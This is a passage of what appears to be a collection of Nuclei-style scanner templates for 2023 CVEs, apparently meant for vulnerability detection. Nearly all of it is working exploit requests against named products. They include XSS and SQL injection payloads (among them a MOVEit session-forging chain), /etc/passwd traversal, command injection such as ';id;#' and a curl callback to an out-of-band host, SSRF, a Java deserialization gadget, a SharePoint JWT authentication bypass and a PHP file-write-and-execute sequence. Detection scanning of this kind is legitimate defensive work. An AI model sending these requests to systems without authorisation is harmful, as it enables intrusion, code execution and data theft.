Execution","severity":"critical"},"requests":[{"raw":["GET /file-manager/ HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\n","POST /file-manager/backend/makefile HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/&name={{str1}}.php\n","POST /file-manager/backend/text HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&content=<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n","POST /file-manager/backend/permissions HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&permissions=0777\n","GET /{{str1}}.php HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_5","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2023-2624","info":{"name":"KiviCare WordPress Plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src onerror=alert(document.domain)> appointment","status\":true"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46732","info":{"name":"XWiki < 14.10.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e","{{BaseURL}}/xwiki/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains(body, \"<script>alert(document.domain)</script>\\\" id=\\\"tmViewSource\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-2122","info":{"name":"Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<img src=a onerror=alert(document.domain)>\")","contains(body_2, \"Image optimizer\")"],"condition":"and"}]}]},{"id":"CVE-2023-0236","info":{"name":"WordPress Tutor LMS <2.0.10 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg onload=prompt(document.domain)>\")","contains(body_2, \"Instructor Registration\")"],"condition":"and"}]}]},{"id":"CVE-2023-41642","info":{"name":"RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /RealGimmWeb/Pages/Sistema/LogObjectTrace.aspx HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: </span><script>alert(document.domain)</script>\n\n__EVENTTARGET=T1bPulsantiera&EVENTARGUMENT=TlbPulsantiera_Item_0%3AUP&___VIEWSTATE='TESTING&LeftArea%3ALeftMenu_hidden=&T1bPulsantiera_CancelClick=false&TlbPulsantiera_hidden=&cbUtente=&txtDataRichiestaDa=&txtDataRichiestaA=&TopArea%3ATopMenu=\n","GET /RealGimmWeb/Pages/ErroreNonGestito.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: </span><script>alert(document.domain)</script>\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>","Invalid_Viewstate"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]}]}]},{"id":"CVE-2023-26256","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["$textMime"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1496","info":{"name":"Imgproxy < 3.14.0 - Cross-site Scripting (XSS)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg"],"matchers":[{"type":"dsl","dsl":["contains(body, 'PC9zdmc+#test')","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["content_security_policy"]}]}]},{"id":"CVE-2023-34599","info":{"name":"Gibbon v25.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php? HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary8m88nqhR1NAnQEYZ\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"address\"\n\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"method\"\n\ndefault\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\n\n017\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibboni18nID\"\n\n0001\n------WebKitFormBoundary8m88nqhR1NAnQEYZ--\n","GET /index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq'><script>alert(document.domain)</script>oq7c8fmwwro&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["><script>alert(document.domain)</script>","gibbon"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23491","info":{"name":"Quick Event Manager < 9.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"qem_calendar\")"],"condition":"and"}]}]},{"id":"CVE-2023-4415","info":{"name":"Ruijie RG-EW1200G Router Background - Login Bypass","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/sys/login"],"body":"{\n  \"username\":\"2\",\n  \"password\":\"admin\",\n  \"timestamp\":1695218596000\n}\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":\"ok\"","\"msg\":\"\u767b\u5165\u6210\u529f\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30625","info":{"name":"Rudder Server < 1.3.0-rc.1  - SQL Injection","severity":"high"},"requests":[{"raw":["POST /v1/warehouse/pending-events HTTP/1.1\nHost: {{Hostname}}\n\n{\"source_id\": \"test'; copy (SELECT '') to program '{{cmd}}'-- - \"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["error getting pending"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-0948","info":{"name":"WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=peachpay&tab=field&\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"peachpay\")"],"condition":"and"}]}]},{"id":"CVE-2023-20864","info":{"name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /csrf HTTP/1.1\nHost: {{Hostname}}\nX-Csrf-Token: Fetch\n","POST /api/v2/internal/cluster/applyMembership HTTP/1.1\nHost: {{Hostname}}\nX-CSRF-Token: {{xcsrftoken}}\nContent-type: application/octet-stream\n\n{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"raw\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"errorMessage\":\"Internal error"]}],"extractors":[{"type":"kval","name":"xcsrftoken","group":1,"internal":true,"kval":["X_CSRF_Token"]}]}]},{"id":"CVE-2023-0552","info":{"name":"WordPress Pie Register <3.8.2.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me"],"redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-43654","info":{"name":"PyTorch TorchServe SSRF","severity":"critical"},"requests":[{"raw":["POST /models?url=http%3a//{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2023-1698","info":{"name":"WAGO - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"package\":\";id;#\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"license\":","\"name\":","uid=","gid="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2779","info":{"name":"Super Socializer < 7.13.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://oast.pro HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<img src=x onerror=alert(document.domain)>\") && contains(body_2, \"facebook_urls\")"],"condition":"and"}]}]},{"id":"CVE-2023-26843","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /NoteEditor.php?FamilyID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nPersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"><img src=x onerror=alert(document.domain)>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-29357","info":{"name":"Microsoft SharePoint - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /_api/web/siteusers HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer\n","GET /_api/web/siteusers HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nAuthorization: Bearer {{generate_jwt(\"{\\\"aud\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"iss\\\":\\\"{{client_id}}\\\",\\\"nbf\\\":1695987703,\\\"exp\\\":2011547223,\\\"ver\\\":\\\"hashedprooftoken\\\",\\\"nameid\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"endpointurl\\\":\\\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\\\",\\\"endpointurlLength\\\":1,\\\"isloopback\\\":true}\",\"none\")}}AAA\nX-PROOF_TOKEN: {{generate_jwt(\"{\\\"aud\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"iss\\\":\\\"{{client_id}}\\\",\\\"nbf\\\":1695987703,\\\"exp\\\":2011547223,\\\"ver\\\":\\\"hashedprooftoken\\\",\\\"nameid\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"endpointurl\\\":\\\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\\\",\\\"endpointurlLength\\\":1,\\\"isloopback\\\":true}\",\"none\")}}AAA\n"],"extractors":[{"type":"regex","part":"header","group":1,"name":"realm","regex":["realm=\"([^\"]*)\""],"internal":true},{"type":"json","json":[".value[].Email"]}],"matchers":[{"type":"word","part":"body_2","words":["LoginName","Email","IsSiteAdmin"],"condition":"and"}]}]},{"id":"CVE-2023-39024","info":{"name":"Harman Media Suite <= 4.2.0 - Local File Disclosure","severity":"high"},"requests":[{"raw":["GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"plcm-content-channel\", \"privacy\", \"coverImage\")","contains(content_type, \"application/vnd.plcm.plcm-content-channel-list+json\")","status_code == 200"],"condition":"and","internal":true}],"extractors":[{"type":"regex","name":"channelId","group":1,"regex":["\"channelId\":\"([^\"]+)\""],"internal":true}]},{"raw":["GET /userportal/api/rest/contentChannels/{{channelId}}/archives/?startIndex=0&pageSize=15&sort=time&onlyIncludeApproved=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"callId\", \"displayName\", \"duration\")","contains(content_type, \"application/vnd.plcm.plcm-csc+json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-22518","info":{"name":"Atlassian Confluence Server - Improper Authorization","severity":"critical"},"requests":[{"raw":["POST /json/setup-restore.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7\nX-Atlassian-Token: no-check\n\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"buildIndex\"\n\nfalse\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"file\";filename=\"{{randstr}}.zip\"\n\n{{randstr}}\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"edit\"\n\nUpload and import\n------WebKitFormBoundaryT3yekvo0rGaL9QR7--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')"],"condition":"and"}]}]},{"id":"CVE-2023-1890","info":{"name":"Tablesome < 1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert`document_domain`</script>\")","contains(body_2, \"tablesome\")"],"condition":"and"}]}]},{"id":"CVE-2023-0334","info":{"name":"ShortPixel Adaptive Images < 3.6.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"shortpixel\") && contains(body, \"</script><img src=1 onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2023-0600","info":{"name":"WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Real Time Traffic"]}]},{"raw":["@timeout: 30s\nGET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"sleep(6)\")"],"condition":"and"}]}]},{"id":"CVE-2023-30258","info":{"name":"MagnusBilling - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27159","info":{"name":"Appwrite <=1.2.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/avatars/favicon?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Appwrite-Server"]}]}]},{"id":"CVE-2023-29204","info":{"name":"XWiki - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//www.oast.me","{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=http:/www.oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-44012","info":{"name":"mojoPortal v.2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Help.aspx?helpkey=xxxxxxx'><svg/onload=alert()+x="],"matchers":[{"type":"dsl","dsl":["contains_any(body, \"mojoPortal\", \"mojo-accordion\", \"mojo-tabs\")","contains(body, \"><svg/onload=alert()\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-23489","info":{"name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(body_1, \"[]\") && contains(body_2, \"Easy Digital Downloads\")"],"condition":"and"}]}]},{"id":"CVE-2023-48023","info":{"name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/log_proxy?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2023-36845","info":{"name":"Juniper J-Web - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?PHPRC=/dev/fd/0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauto_prepend_file=\"/etc/passwd\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["Juniper"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4114","info":{"name":"PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Drinks & Extras\", \"Checkout\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-36289","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}\"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain)","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4110","info":{"name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Booking\", \"Arrival\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-4115","info":{"name":"PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Enquiry summary\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-24243","info":{"name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-46347","info":{"name":"PrestaShop Step by Step products Pack - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /modules/ndk_steppingpack/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type, \"text/html\")","contains(header, \"PrestaShop\")"],"condition":"and"}]}]},{"id":"CVE-2023-20887","info":{"name":"VMware VRealize Network Insight - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /saas./resttosaasservlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-thrift\n\n[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`{{cmd}}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"rec\":"]},{"type":"word","part":"header","words":["application/x-thrift"]},{"type":"word","part":"body","negative":true,"words":["Provided invalid node Id","Invalid nodeId"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38194","info":{"name":"SuperWebMailer - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/keepalive.php?caller=%22%3E%3Cimg+src%3d1+onerror%3dalert(document.domain)+%2F%3E&uq_mt=1664137650.085"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<img src=1 onerror=alert(document.domain) />\")","contains(tolower(body_1), \"superwebmailer\")","contains(header_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-3846","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-35159","info":{"name":"XWiki >= 3.4-milestone-1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)","{{BaseURL}}/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert(document.domain)","deletespace.Sandbox"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-29919","info":{"name":"SolarView Compact <= 6.00 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /texteditor.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"texteditor.php\"","adduser.conf","deluser.conf"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36934","info":{"name":"MOVEit Transfer - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%27{{session_cookie}}%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+IpAddress=%27{{public_ip()}}%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%27{{session_cookie}}%27%23 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntransaction=signon\n","POST /human.aspx?ep={{url_encode(ep)}} HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: InitialPage=zzzz.aspx;\n\ntransaction=passchangerequest\n","POST /machine.aspx HTTP/2\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0; ASP.NET_SessionId={{session}};\n\na=a\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{session_cookie}}\nContent-Type: 